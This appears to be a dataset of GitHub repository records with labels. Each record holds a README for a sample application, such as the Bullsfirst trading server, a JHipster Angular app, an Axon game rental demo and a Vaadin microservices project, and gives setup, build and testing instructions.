archfirst/bullsfirst-server-java
A sample trading application demonstrating best practices in software development
null
# bullsfirst-server-java

Bullsfirst is a sample trading application demonstrating best practices in software development. You can read more about it on [archfirst.org](https://archfirst.org/bullsfirst/).

## Requirements

- [JDK 7](http://www.oracle.com/technetwork/java/javase/downloads/index.html)
- [Apache Maven 3.x](https://maven.apache.org/)
- [MySQL 5.x](http://dev.mysql.com/downloads/)
- [mysql-connector-java 5.x](http://dev.mysql.com/downloads/connector/j/)
- [GlassFish 3.1.2.2](http://download.java.net/glassfish/3.1.2.2/release/glassfish-3.1.2.2.zip)

## Build Instructions

### Install quickfixj in the Maven repository

This step is required because connecting to the quickfixj Maven repository was giving the following error:

```
No connector available to access repository MarketceteraRepo (http://repo.marketcetera.org/maven) of type default using the available factories WagonRepositoryConnectorFactory
```

- Download quickfixj 1.5.0 from http://sourceforge.net/project/showfiles.php?group_id=163099 and unzip it at `C:/lib/quickfixj-1.5.0` (you will have to rename the folder to this). Run the following command to install the library in the local Maven repository:

```
mvn install:install-file -Dfile=C:/lib/quickfixj-1.5.0/quickfixj-all-1.5.0.jar -DgroupId=quickfixj -DartifactId=quickfixj-all -Dversion=1.5.0 -Dpackaging=jar -DgeneratePom=true
```

### Start the MySQL Database Server and log in as root

- Start MySQL System Tray Monitor (from Start > All Programs > MySQL).
- In the system tray, right-click on MySQL System Tray Monitor and select Start Instance.
- Now log in to mysql on the command line.
```
> mysql --user=root --password
Enter password: xxxx
mysql> show databases;
```

### Create a Database for Bullsfirst Exchange

```
mysql> create database bfexch_javaee;
mysql> create user 'bfexch_javaee'@'localhost' identified by '<password>';
mysql> grant all on bfexch_javaee.* TO 'bfexch_javaee'@'localhost';
```

### Create a Database for Bullsfirst OMS

```
mysql> create database bfoms_javaee;
mysql> create user 'bfoms_javaee'@'localhost' identified by '<password>';
mysql> grant all on bfoms_javaee.* TO 'bfoms_javaee'@'localhost';
```

### Configure GlassFish

- Open a command shell and traverse to GLASSFISH_HOME\bin.
- Stop the GlassFish server:
```
asadmin stop-domain domain1
```
- Copy the MySQL driver (mysql-connector-java-5.1.13-bin.jar) to GLASSFISH_HOME\lib.
- Type the following command to create a master-password file under GLASSFISH_HOME\domains\domain1 (required by maven-glassfish-plugin):
```
asadmin change-master-password --savemasterpassword=true domain1
Enter the current master password> changeit
Enter the new master password> [new-password]
Enter the new master password again> [new-password]
```
- Type the following command at the command prompt to start the server:
```
asadmin start-domain domain1
```
- Log in to the GlassFish admin console as admin (url http://localhost:4848).
- Add the Hibernate JPA provider (in addition to the default TopLink JPA provider):
  - In the navigation bar, click on Update Tool.
  - Select the component called hibernate and click Install.
- Stop GlassFish before proceeding to the next step (the Hibernate JPA provider will be automatically recognized during the next startup):
```
asadmin stop-domain domain1
```
- Unfortunately, what gets installed is Hibernate 3.5.0, which is incompatible with Bullsfirst. Replace it with Hibernate 3.6.0. To do this, pick up hibernate3.jar from the hibernate-3.6.0.Final distribution and drop it in GLASSFISH_HOME\lib, overwriting the original file.
### Configure GlassFish for slf4j Logging

Based on [this](http://hwellmann.blogspot.com/2010/12/glassfish-logging-with-slf4j-part-2.html) article.

- Copy the following JARs to GLASSFISH_HOME\lib\endorsed:
```
wget http://central.maven.org/maven2/org/slf4j/jul-to-slf4j/1.6.1/jul-to-slf4j-1.6.1.jar
wget http://central.maven.org/maven2/org/slf4j/slf4j-api/1.6.1/slf4j-api-1.6.1.jar
wget http://central.maven.org/maven2/org/slf4j/slf4j-log4j12/1.6.1/slf4j-log4j12-1.6.1.jar
wget http://mirrors.ibiblio.org/pub/mirrors/maven2/log4j/log4j/1.2.8/log4j-1.2.8.jar
log4j-config-xxx.jar (from GlassFish Logging Configuration) (choose between dev or prod)
```
- Edit GLASSFISH_HOME\domains\domain1\config\domain.xml and add the following properties in the jvm-options section. There are two such sections; put these lines in the first section, the one under `<config name="server-config">`:
```
<jvm-options>-Djava.util.logging.config.file=${com.sun.aas.instanceRoot}/config/my_logging.properties</jvm-options>
<jvm-options>-Dlog4j.log.file=${com.sun.aas.instanceRoot}/logs/glassfish.log</jvm-options>
```
- Create the my_logging.properties file specified in the jvm-options above under GLASSFISH_HOME\domains\domain1\config with the following contents:
```
handlers = org.slf4j.bridge.SLF4JBridgeHandler
com.sun.enterprise.server.logging.GFFileHandler.flushFrequency=1
com.sun.enterprise.server.logging.GFFileHandler.file=${com.sun.aas.instanceRoot}/logs/server.log
com.sun.enterprise.server.logging.GFFileHandler.rotationTimelimitInMinutes=0
com.sun.enterprise.server.logging.GFFileHandler.logtoConsole=false
com.sun.enterprise.server.logging.GFFileHandler.rotationLimitInBytes=2000000
com.sun.enterprise.server.logging.GFFileHandler.alarms=false
com.sun.enterprise.server.logging.GFFileHandler.formatter=com.sun.enterprise.server.logging.UniformLogFormatter
com.sun.enterprise.server.logging.GFFileHandler.retainErrorsStasticsForHours=0
```
- Restart GlassFish.
You will now see only a few messages in server.log; all the rest go to glassfish.log.

### Create JDBC Connection Pools on GlassFish

#### Create the bfexch_javaee Connection Pool

- Log in to the GlassFish admin console as admin (url http://localhost:4848).
- In the navigation bar, click on Resources > JDBC > Connection Pools.
- Click New on the Connection Pools page.
- Create a new connection pool using the following parameters and click Next:
```
Pool Name: bfexch_javaee
Resource Type: javax.sql.ConnectionPoolDataSource
Database Vendor: MySql
```
- Fill in the following properties and click Finish:
```
User: bfexch_javaee
Password: bfexch_javaee (put the correct password for your database)
URL & Url: jdbc:mysql://localhost:3306/bfexch_javaee
```
- You will now be on the JDBC Connection Pools page. Click on the connection pool you just created and then click Ping to make sure the connection is set up properly.
- In the navigation bar, click on Resources > JDBC > JDBC Resources.
- Click New on the JDBC Resources page.
- Create a new JDBC resource using the following parameters and click OK:
```
JNDI Name: bfexch_javaee_connection_pool
Pool Name: bfexch_javaee
```

#### Create the bfoms_javaee Connection Pool

Follow the same steps as above, but replace `bfexch_javaee` with `bfoms_javaee` (remember to put the correct database password).

### Create a JDBC Security Realm

- In the navigation bar, click on Configurations > server-config > Security > Realms.
- Click New.
- Fill in the fields as follows:
  - Name: bullsfirst-javaee
  - Class Name: com.sun.enterprise.security.auth.realm.jdbc.JDBCRealm
  - JAAS Context: jdbcRealm
  - JNDI (datasource): bfoms_javaee_connection_pool
  - User Table: Users
  - User Name Column: username
  - Password Column: passwordHash
  - Group Table: UserGroup
  - Group Name Column: groupname
  - Digest Algorithm: MD5
  - Encoding: Base64

### Configure JMS on GlassFish (Open MQ)

- In the navigation bar, click on Configurations > server-config > Java Message Service.
- Confirm that the Type field is set to EMBEDDED.
- In the navigation bar, click on Resources > JMS Resources > Connection Factories.
- Click on New...
- Fill in the following fields:
```
Pool Name: jms/ConnectionFactory
Resource Type: javax.jms.ConnectionFactory
```
- Click OK. This creates a connection factory called jms/ConnectionFactory and also (under Connectors):
  - a Connector Resource called `jms/ConnectionFactory`
  - a Connection Pool called `jms/ConnectionFactory`
- In the navigation bar, click on Resources > JMS Resources > Destination Resources.
- Click on New...
- Fill in the following fields (this step also creates an Admin Object resource called `jms/OmsToExchangeQueue`):
```
JNDI Name: jms/OmsToExchangeQueue
Physical Destination Name: OmsToExchangeQueue
Resource Type: javax.jms.Queue
```
- Similarly create two more queues and a topic (even though we don't have a Spring OMS yet, its queue must be created; the exchange expects it to be there).
```
JNDI Name: jms/ExchangeToOmsJavaeeQueue
Physical Destination Name: ExchangeToOmsJavaeeQueue
Resource Type: javax.jms.Queue

JNDI Name: jms/ExchangeToOmsSpringQueue
Physical Destination Name: ExchangeToOmsSpringQueue
Resource Type: javax.jms.Queue

JNDI Name: jms/ExchangeMarketPriceTopic
Physical Destination Name: ExchangeMarketPriceTopic
Resource Type: javax.jms.Topic
```
- Expose the dead message queue (mq.sys.dmq) to JNDI by creating a resource as follows:
```
JNDI Name: jms/DeadMessageQueue
Physical Destination Name: mq.sys.dmq
Resource Type: javax.jms.Queue
```
- You can use imqcmd (under C:\apps\glassfish-3.1.2.2\mq\bin) to manage the queues. The default credentials for this command are admin/admin.
```
To query a queue:
imqcmd query dst -t q -n ExchangeToOmsJavaeeQueue
imqcmd query dst -t q -n mq.sys.dmq (dead message queue)

To purge a queue:
imqcmd purge dst -t q -n ExchangeToOmsJavaeeQueue
imqcmd purge dst -t q -n mq.sys.dmq (dead message queue)
```

### Build Maven Projects

Either build the projects one at a time as described below, or run the `build-all.bat` batch file to build all projects in one shot.
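The JDBC security realm configured earlier stores passwords as an MD5 digest, Base64-encoded. If you ever need to seed the Users table by hand (for example with SQL inserts), a hash in that format can be produced with a few lines of Python; this helper is a convenience sketch, not part of the Bullsfirst code base:

```python
import base64
import hashlib


def glassfish_password_hash(password):
    """MD5-digest the password and Base64-encode the raw digest bytes,
    matching the realm's Digest Algorithm (MD5) and Encoding (Base64)."""
    digest = hashlib.md5(password.encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii")


# Value to store in the Users.passwordHash column:
print(glassfish_password_hash("secret"))
```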
#### Archfirst Common Libraries

- Open a command shell and traverse to SRC_DIR\java\projects\archfirst-common.
- Type the following command at the command prompt to build the project:
```
mvn clean install
```

#### Bullsfirst Common Libraries

- Traverse to SRC_DIR\java\projects\bullsfirst-common.
- Build the project:
```
mvn clean install
```

#### Bullsfirst Exchange

- Traverse to SRC_DIR\java\projects\bullsfirst-exchange-javaee.
- Build the project:
```
mvn clean install
```
- Create the database schema and import data:
```
cd bfexch-ddl
create-schema
import
```
- Deploy the application to GlassFish (assuming that the GlassFish server is running):
```
cd ..\bfexch-javaee-web
mvn glassfish:deploy
```

#### Bullsfirst OMS Common

- Traverse to SRC_DIR\java\projects\bullsfirst-oms-common.
- Build the project:
```
mvn clean install
```
- Create the database schema and import data:
```
cd bfoms-common-ddl
create-schema
import (optional – create jhorner user)
```

#### Bullsfirst Java EE

- Traverse to SRC_DIR\java\projects\bullsfirst-oms-javaee.
- Build the project:
```
mvn clean install
```
- Deploy the application to GlassFish (assuming that the GlassFish server is running):
```
cd bfoms-javaee-web
mvn glassfish:deploy
```

### Verify the installation

- Point your browser to http://localhost:8080/bfexch-javaee to verify that the Exchange app comes up.
- Point your browser to http://localhost:8080/bfoms-javaee to verify that the OMS app comes up.

### Build Bullsfirst jQuery-Backbone Client

- See the instructions [here](https://github.com/archfirst/bullsfirst-jquery-backbone) to build the Bullsfirst client.
- Deploy the client at port 9000 (since port 8080 is taken by GlassFish).

### Start Trading!

Point your browser to [http://localhost:9000](http://localhost:9000) to start trading.
1
hitherejoe/WatchTower
A sample application created to test, explore and demonstrate the Proximity Beacon API
null
WatchTower
===================

<p align="center">
    <img src="images/ic_launcher_web.png" alt="Web Launcher"/>
</p>

Note: In order to use this app, you'll need to use the Google API Console to register your SHA1 token along with the package name; the app won't work otherwise.

WatchTower is a simple application which was created to test and explore the functionality of the new [Proximity Beacon API](https://developers.google.com/beacons/proximity/guides). The application can be used to try out:

- Registering Beacons
- Updating Beacons
- Viewing Beacons
- Viewing Beacon Diagnostics
- Viewing Beacon Attachments
- Adding Beacon Attachments
- Deleting Single Beacon Attachments
- Deleting Batch Beacon Attachments by Type

Some features are not very practical within a mobile app (for example, adding JSON data to attachments), so these have not been included.

<p align="center">
    <img src="images/device_screenshot.png" alt="Device Screenshot"/>
</p>

Note: This was built *quickly* to simply test the API's functionality. If you come across any bugs, please feel free to submit them as an issue, or open a pull request ;)

For further information, please read the [supporting blog post](https://medium.com/ribot-labs/exploring-google-eddystone-with-the-proximity-beacon-api-bc9256c97e05).

Requirements
------------

- [Android SDK](http://developer.android.com/sdk/index.html)
- Android [5.1 (API 22)](http://developer.android.com/tools/revisions/platforms.html#5.1)
- Android SDK Tools
- Android SDK Build tools 22.0.1
- Android Support Repository
- Android Support library
- Enabled [Unit Test support](http://tools.android.com/tech-docs/unit-testing-support)

Building
--------

To build, install and run a debug version, run this from the root of the project:

    ./gradlew installRunDebug

Testing
--------

For Android Studio to use syntax highlighting for automated tests and unit tests, you **must** switch the Build Variant to the desired mode.
To run **unit** tests on your machine using [Robolectric](http://robolectric.org/):

    ./gradlew testDebug

To run **automated** tests on connected devices:

    ./gradlew connectedAndroidTest

Attributions
------------

Thanks to the following for icons off of the Noun Project:

[Stéphanie Rusch](https://thenounproject.com/BeezkOt) - Beacon Icon<br/>
[Abraham](https://thenounproject.com/gorilladigital) - Cloud Icon<br/>
[S.Shohei](https://thenounproject.com/shohei909) - Battery Icon<br/>
[Juergen Bauer](https://thenounproject.com/Juergen) - Alert Icon<br/>
[Pham Thi Dieu Linh](https://thenounproject.com/phdieuli) - Attachment Icon<br/>
1
saki4510t/AudioVideoPlayerSample
Sample project to play audio and video from MPEG4 file using MediaCodec
null
AudioVideoPlayerSample
=========================

Sample project to play audio and video from an MPEG4 file using MediaCodec.

Copyright (c) 2014-2015 saki t_saki@serenegiant.com

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

All files in the folder are under this Apache License, Version 2.0.
1
johnhowe/BlueTerm
BlueTerm is the result of mix Term and BluetoothChat sample. http://pymasde.es/blueterm/
null
BlueTerm ======== BlueTerm is the result of mix Term and BluetoothChat sample. http://pymasde.es/blueterm/
0
jhipster/jhipster-sample-app-ng2
DEPRECATED now that Angular 2+ is the default - This is a sample application created with JHipster, using Angular 2
angular jhipster
# jhipsterSampleApplicationNG2

This application was generated using JHipster 4.12.0; you can find documentation and help at [http://www.jhipster.tech/documentation-archive/v4.12.0](http://www.jhipster.tech/documentation-archive/v4.12.0).

## Development

Before you can build this project, you must install and configure the following dependencies on your machine:

1. [Node.js][]: We use Node to run a development web server and build the project. Depending on your system, you can install Node either from source or as a pre-packaged bundle.
2. [Yarn][]: We use Yarn to manage Node dependencies. Depending on your system, you can install Yarn either from source or as a pre-packaged bundle.

After installing Node, you should be able to run the following command to install development tools. You will only need to run this command when dependencies change in [package.json](package.json).

    yarn install

We use yarn scripts and [Webpack][] as our build system. Run the following commands in two separate terminals to create a blissful development experience where your browser auto-refreshes when files change on your hard drive.

    ./mvnw
    yarn start

[Yarn][] is also used to manage CSS and JavaScript dependencies used in this application. You can upgrade dependencies by specifying a newer version in [package.json](package.json). You can also run `yarn update` and `yarn install` to manage dependencies. Add the `help` flag on any command to see how you can use it. For example, `yarn help update`.

The `yarn run` command will list all of the scripts available to run for this project.

### Service workers

Service workers are commented out by default; to enable them, please uncomment the following code:
* The service worker registering script in index.html:

```
<script>
    if ('serviceWorker' in navigator) {
        navigator.serviceWorker
        .register('./sw.js')
        .then(function() { console.log('Service Worker Registered'); });
    }
</script>
```

Note: workbox creates the respective service worker and dynamically generates the `sw.js`.

### Managing dependencies

For example, to add the [Leaflet][] library as a runtime dependency of your application, you would run the following command:

    yarn add --exact leaflet

To benefit from TypeScript type definitions from the [DefinitelyTyped][] repository in development, you would run the following command:

    yarn add --dev --exact @types/leaflet

Then you would import the JS and CSS files specified in the library's installation instructions so that [Webpack][] knows about them.

Edit the [src/main/webapp/app/vendor.ts](src/main/webapp/app/vendor.ts) file:

~~~
import 'leaflet/dist/leaflet.js';
~~~

Edit the [src/main/webapp/content/css/vendor.css](src/main/webapp/content/css/vendor.css) file:

~~~
@import '~leaflet/dist/leaflet.css';
~~~

Note: there are still a few other things remaining to do for Leaflet that we won't detail here.

For further instructions on how to develop with JHipster, have a look at [Using JHipster in development][].

### Using angular-cli

You can also use [Angular CLI][] to generate some custom client code. For example, the following command:

    ng generate component my-component

will generate a few files:

    create src/main/webapp/app/my-component/my-component.component.html
    create src/main/webapp/app/my-component/my-component.component.ts
    update src/main/webapp/app/app.module.ts

## Building for production

To optimize the jhipsterSampleApplicationNG2 application for production, run:

    ./mvnw -Pprod clean package

This will concatenate and minify the client CSS and JavaScript files. It will also modify `index.html` so it references these new files.
To ensure everything worked, run:

    java -jar target/*.war

Then navigate to [http://localhost:8080](http://localhost:8080) in your browser.

Refer to [Using JHipster in production][] for more details.

## Testing

To launch your application's tests, run:

    ./mvnw clean test

### Client tests

Unit tests are run by [Karma][] and written with [Jasmine][]. They're located in [src/test/javascript/](src/test/javascript/) and can be run with:

    yarn test

UI end-to-end tests are powered by [Protractor][], which is built on top of WebDriverJS. They're located in [src/test/javascript/e2e](src/test/javascript/e2e) and can be run by starting Spring Boot in one terminal (`./mvnw spring-boot:run`) and running the tests (`yarn run e2e`) in a second one.

### Other tests

Performance tests are run by [Gatling][] and written in Scala. They're located in [src/test/gatling](src/test/gatling) and can be run with:

    ./mvnw gatling:execute

For more information, refer to the [Running tests page][].

## Using Docker to simplify development (optional)

You can use Docker to improve your JHipster development experience. A number of docker-compose configurations are available in the [src/main/docker](src/main/docker) folder to launch required third-party services. For example, to start a mysql database in a docker container, run:

    docker-compose -f src/main/docker/mysql.yml up -d

To stop it and remove the container, run:

    docker-compose -f src/main/docker/mysql.yml down

You can also fully dockerize your application and all the services that it depends on. To achieve this, first build a docker image of your app by running:

    ./mvnw verify -Pprod dockerfile:build

Then run:

    docker-compose -f src/main/docker/app.yml up -d

For more information refer to [Using Docker and Docker-Compose][]; this page also contains information on the docker-compose sub-generator (`jhipster docker-compose`), which is able to generate docker configurations for one or several JHipster applications.
## Continuous Integration (optional)

To configure CI for your project, run the ci-cd sub-generator (`jhipster ci-cd`); this will let you generate configuration files for a number of Continuous Integration systems. Consult the [Setting up Continuous Integration][] page for more information.

[JHipster Homepage and latest documentation]: http://www.jhipster.tech
[JHipster 4.12.0 archive]: http://www.jhipster.tech/documentation-archive/v4.12.0
[Using JHipster in development]: http://www.jhipster.tech/documentation-archive/v4.12.0/development/
[Using Docker and Docker-Compose]: http://www.jhipster.tech/documentation-archive/v4.12.0/docker-compose
[Using JHipster in production]: http://www.jhipster.tech/documentation-archive/v4.12.0/production/
[Running tests page]: http://www.jhipster.tech/documentation-archive/v4.12.0/running-tests/
[Setting up Continuous Integration]: http://www.jhipster.tech/documentation-archive/v4.12.0/setting-up-ci/
[Gatling]: http://gatling.io/
[Node.js]: https://nodejs.org/
[Yarn]: https://yarnpkg.org/
[Webpack]: https://webpack.github.io/
[Angular CLI]: https://cli.angular.io/
[BrowserSync]: http://www.browsersync.io/
[Karma]: http://karma-runner.github.io/
[Jasmine]: http://jasmine.github.io/2.0/introduction.html
[Protractor]: https://angular.github.io/protractor/
[Leaflet]: http://leafletjs.com/
[DefinitelyTyped]: http://definitelytyped.org/
1
smcvb/gamerental
Sample project for a Game Rental application as a showcase for Axon
axon axon-framework cqrs ddd event-sourcing
# Game Rental Application

## Description

The "Game Rental" application showcases how [Axon Framework](https://github.com/AxonFramework/AxonFramework) and [Axon Server](https://developer.axoniq.io/axon-server/overview) or [AxonIQ Cloud](https://cloud.axoniq.io/) can be used during software development. The domain focused on is that of rental services from the perspective of a video game store.

This repository provides just such an application, albeit a demo rather than a full-fledged solution. It serves the personal purpose of having a stepping-stone application to live-code during presentations. I intend to build upon this sample during consecutive talks, further enhancing its capabilities as time progresses. For others, I hope this provides a quick and straightforward look into what it means to build an Axon-based application. Due to its nature of being based on Axon, it incorporates [DDD](https://developer.axoniq.io/domain-driven-design/overview), [CQRS](https://developer.axoniq.io/cqrs/overview), [Event Sourcing](https://developer.axoniq.io/event-sourcing/overview), and an overall message-driven solution to communicate between distinct components.

> **Demo Recordings with different Game Rental implementations**
>
> Since I aim to use this project for some time, it'll change through its lifecycle.
> Most notably, I'll keep it up to date with recent versions of the dependencies.
>
> Due to this, recordings from previous iterations of this project will likely show slight deviations.
> However, the steps taken during those recordings will remain intact.

## Project Traversal

Distinct branches will be (made) available per public speaking event, sharing a start and final solution branch separately. Additionally, several branches representing the steps throughout the lifecycle of the "Game Rental" application will be present, allowing you to:

* Check out the exact step that interests you.
* Perform a `git reset --hard step#` to reset your current branch.
Next to providing the convenience of showing the flow, it also serves as a backup during the presentation. This project currently contains the following steps:

1. The `core-api`, containing the commands, events, queries, and query responses.
2. The `command` model has been created, showing a `Game` aggregate.
3. The application connects to [AxonIQ Console](https://console.axoniq.io/) and [AxonIQ Cloud](https://console.cloud.axoniq.io/) through the added AxonIQ Console and [Axon Server](https://developer.axoniq.io/axon-server/overview) properties in the `application.properties`.
4. The `query` model, a `GameView`, is provided, created/updated, and made queryable through the `GameCatalogProjector`.
5. This step includes the [Reactor Extension](https://github.com/AxonFramework/extension-reactor), which is used by the `GameRentalController`.
6. This step introduces cleaner distributed exception handling. It does so by throwing specific exceptions in `@ExceptionHandler` annotated functions in the `Game` aggregate and `GameCatalogProjector`, containing an `ExceptionStatusCode`.
7. Spring's `@Profile("profile-name")` annotation has been added to the `Game`, `GameCatalogProjector`, `GameViewRepository`, and `GameRentalController`, allowing for application distribution.
8. Preparation to introduce another endpoint based on RSocket, by renaming the controller to contain "rest" in the name and by extracting the exception mapping registration.
9. Introduce the `GameRentalRSocketController`, providing an entry point to the application using [RSocket](https://rsocket.io/).
10. Add the "reservations" query end, invoking a `ReservationService` once a game is returned. Since this service only has a flunky implementation, attach a [dead-letter queue](https://docs.axoniq.io/reference-guide/axon-framework/events/event-processors#dead-letter-queue) to the `reservations` processing group to deal with errors.
## Running and testing the application

As this is a Spring Boot application, simply running the `GameRentalApplication` is sufficient. However, Spring profiles are present, which allow for running portions of this application. More specifically, there are `command`, `query`, `ui`, `rsocket`, and `reservations` profiles present, separating the `Game` aggregate, `GameCatalogProjector`, `GameRentalRestController`, `GameRentalRSocketController`, and reservation-specific components into distinct groups. Furthermore, when you use IntelliJ, you can use the "Run Configurations" from the `./.run` folder to speed up the startup process.

The application does expect it can make a connection with an Axon Server instance. Ideally, [Axon Cloud](https://console.cloud.axoniq.io/) is used for this, as is shown in step 3. If you desire to run Axon Server locally, you can download it [here](http://download.axoniq.io/quickstart/AxonQuickstart.zip).

> **Unit Tests**
>
> Any new components introduced in a step include unit tests.
> These can be used to better understand the project.

For validating the application's internals, you can run the tests, use the REST endpoint, or connect with the [RSocket](https://rsocket.io/) endpoint.

When testing through the REST endpoint with [IntelliJ Ultimate](https://www.jetbrains.com/help/idea/http-client-in-product-code-editor.html), you can use the included `.http` files (in the `http-requests` folder of this project). The `1-register-games.http` file allows for the registration of several games to build a base catalog. The `2-rent-return-find.http` file contains rent, return, and find operations for testing. The `3-bulk-rent-return.http` file contains a bulk of rent and return operations for a single game to test bulk behavior. The `4-dead-letter-management.http` file contains the endpoint to process dead letters.

When testing through RSocket, the most straightforward approach is to install the [RSocket Client CLI](https://github.com/making/rsc), or `rsc` for short.
The README of `rsc` provides concrete explanations on how to install it in your environment. With `rsc` in place, you can use the following commands to test the application:

* Register a game - `rsc --debug --request --route register --data="{\"gameIdentifier\":\"8668\",\"title\":\"Hades\",\"releaseDate\":\"2020-09-17T00:00:01.000009Z\",\"description\":\"Roguelike dungeon crawler set in ancient Greek mythology\",\"singleplayer\":true,\"multiplayer\":false}" tcp://localhost:7000`
* Rent a game - `rsc --debug --fnf --route rent --data="{\"gameIdentifier\":\"8668\",\"renter\":\"Ben Wilcock\"}" tcp://localhost:7000`
* Return a game - `rsc --debug --fnf --route return --data="{\"gameIdentifier\":\"8668\",\"renter\":\"Ben Wilcock\"}" tcp://localhost:7000`
* Find a game - `rsc --debug --request --route find --data="8668" tcp://localhost:7000`
* Watch the game catalog - `rsc --debug --stream --route catalog tcp://localhost:7000`

## Starting your own Axon project

The [steps](#project-traversal) this project traverses show a common approach towards constructing an Axon application. If you want to begin from scratch, consider these key aspects:

* Use the [AxonIQ Initializr](https://start.axoniq.io/) to kick-start your project.
* Use [Axon Cloud Console](https://console.cloud.axoniq.io/) to connect your application to a context. Using Axon Cloud allows you to persist your events and distribute commands, events, and queries.
* If you want a longer learning experience, please take a look at the [AxonIQ Academy](https://academy.axoniq.io/).
* Whenever anything is unclear, check out the [Reference Guide](https://docs.axoniq.io/reference-guide/) or drop a question on the [forum](https://discuss.axoniq.io/).
1
kinabalu/mysticpaste
A sample pastebin built using the Apache Wicket Java web framework
null
# Overview

This pastebin was built using Apache Wicket. The original code was built by several folks as a tutorial for learning Wicket named 5 Days of Wicket. There's a link in the navigation to the source code, which you can peruse at your leisure.

The idea of a pastebin is simple: copy all or a fragment of code you need help with into the content box on the page. Select which language the code is in for nice syntax highlighting provided by the SyntaxHighlighter JavaScript library. You will receive a small URL to paste into an email, IRC, mailing list, or instant message to receive help on your issue. We have plugins for 4 different development environments so you can paste directly from the editor.

## Environment Configuration

### The Mystic bits

Mystic Paste is set up with Maven, so to build a war, just type `mvn package -Dmaven.test.skip=true`

Pull it into any IDE, find `Start.java` in `web/src/test/java/com/mysticcoders`, and execute its `main`. You should then have a pastebin running.

## Deploying

Deployment should be as simple as adding your own `filters-DEV.properties` and then typing:

`mvn package -Dmaven.test.skip=true -PDEV`
1
daemontus/VuforiaTransparentVideo
Sample app that can render transparent video using the augmented reality framework Vuforia.
null
Vuforia Transparent Video
=======================

Hi, this is an example project that shows how to use the Vuforia augmented reality framework to display video with transparency, such as the one shown in the screenshot.

For more info, read this article: http://treeset.wordpress.com/2014/03/29/chroma-keying-with-vuforia-a-k-a-transparent-video/

##### Using older version of Vuforia? Try this branch: [Old](https://github.com/daemontus/VuforiaTransparentVideo/tree/old)

![Transparent Video Example](https://treeset.files.wordpress.com/2014/03/screenshot_2016-06-12-14-15-55.png)
1
khauser/microservices4vaadin
Sample application to show the secured integration of microservices and Vaadin
authserver docker eventstore gradle microservice oauth2 rancher redis service-discovery spring-session sso vaadin
# microservices4vaadin

![CircleCI](https://circleci.com/gh/khauser/microservices4vaadin.png?style=shield&circle-token=e56d14269e12d73dcc8b45b8dad847985d4e20fb) [![Coverage Status](https://coveralls.io/repos/github/khauser/microservices4vaadin/badge.svg?branch=master)](https://coveralls.io/github/khauser/microservices4vaadin?branch=master)

Exemplary application to show the SSO- and OAuth2-secured integration of microservices with Spring Cloud and Vaadin.

Main concepts in this project are:

* Microservices ("Software that Fits in Your Head")
* Secured gateway (SSO and OAuth2)
* Service discovery
* Circuit breaking
* Shared session across all services
* Event store to fulfill CQRS principles

## Architecture:

![Architecture](/doc/Architecture.png)

* **Authserver**:
  * Authentication and authorization service
  * Allows user login and also user registration via REST
  * Generates a Spring session (persisted in Redis) which also holds the security context
* **Configserver**:
  * Centralized configuration of each service
* **Edge**:
  * SSO gateway to the frontend and also directly to the backend
  * UI for the landing page, the login and the registration panels
  * Gets the security context and the user data from the Spring session
* **Eventstore**:
  * Distributes events across microservices via RabbitMQ and persists them in MongoDB
* **Frontend**:
  * Vaadin frontend with some simple but responsive UI
  * Load-balanced (Ribbon) access to the backend
  * Gets user data from the Spring session
* **UserService**:
  * Represents the user domain
* **Backend**:
  * Simple but secured REST resource as backend for the frontend
* **Discovery**: service discovery with Eureka
* **Turbine** + **Hystrixdashboard**: use Hystrix as a circuit breaker

ToDo:

* add a backend service

## Main frameworks:

* Spring: [Boot](http://projects.spring.io/spring-boot/), [Data JPA](http://projects.spring.io/spring-data-jpa), [Session](http://projects.spring.io/spring-session), [Cloud Security](http://cloud.spring.io/spring-cloud-security)
* 
[Vaadin](https://www.vaadin.com/)
* Netflix: [Zuul](https://github.com/Netflix/zuul), [Eureka](https://github.com/Netflix/eureka), [Hystrix](https://github.com/Netflix/Hystrix)
* [AxonFramework](http://www.axonframework.org/)
* [Rancher](http://rancher.com/)

## Installation:

* install JDK 8
* install Redis+RabbitMQ+MongoDB+MySQL (you can also use the [docker-compose.yml](docker-compose.yml) file)
* Run `gradlew clean build` to compile and build the application
* Run `start-all.bat` to start the list of services
* `http://localhost` should bring you to the landing page (with a redirect to https)

## Development:

* Git, Eclipse with Gradle IDE (Buildship), and [lombok](https://projectlombok.org/)

### Set up project:

* checkout git repository
* run `docker-compose up -d` to start the dependent Redis, RabbitMQ, MongoDB and MySQL services (the DBs will also be added automatically)
* `gradlew clean build` to compile the project
* run `start-all.bat` on Windows or `start-all.sh` on Unix

## Deployment:

* The project can be deployed to a Rancher stack using the given `rancher-docker-compose.yml`. The databases from above need to be added manually here as well, within the execute shell of the MySQL container. ![Rancher stack](/doc/rancher_stack_graph.png)
* If all works fine (services might need to be restarted) you should see this landing page: ![Landing page](/doc/landing_page.png) Initial test credentials are `ttester@test.de/quert6`.
* Fingers crossed.. Finally the Vaadin UI should show up: ![Vaadin UI](/doc/vaadin_ui.png)
1
michaelliao/how-to-become-rich
A sample Maven repo that makes you rich.
null
# How to Become Rich

This is a tutorial about how to publish a Maven artifact to GitHub:

https://www.liaoxuefeng.com/wiki/1252599548343744/1347981037010977

### Usage

Add the following to `pom.xml`:

```
<project ...>
    ...
    <repositories>
        <repository>
            <id>github-rich-repo</id>
            <name>The Rich Repository on Github</name>
            <url>https://michaelliao.github.io/how-to-become-rich/maven-repo/</url>
        </repository>
    </repositories>
    <dependencies>
        <dependency>
            <groupId>com.itranswarp.rich</groupId>
            <artifactId>how-to-become-rich</artifactId>
            <version>1.0.0</version>
        </dependency>
    </dependencies>
    ...
</project>
```

### Sample code

```
Millionaire millionaire = new Millionaire();
System.out.println(millionaire.howToBecomeRich());
```
1
spring-cloud-services-samples/animal-rescue
A sample application that demonstrates the usage of Spring Cloud Gateway for VMware Tanzu or Spring Cloud Gateway for Kubernetes.
null
# Animal Rescue

![Test All](https://github.com/spring-cloud-services-samples/animal-rescue/workflows/Test%20All/badge.svg?branch=master)

Sample app for VMware's Spring Cloud Gateway commercial products. Features we demonstrate with this sample app:

- Routing traffic to configured internal routes with container-to-container network
- Gateway routes configured through service bindings
- Simplified route configuration
- SSO login and token relay on behalf of the routed services
- Required scopes on routes (tag: `require-sso-scopes`)
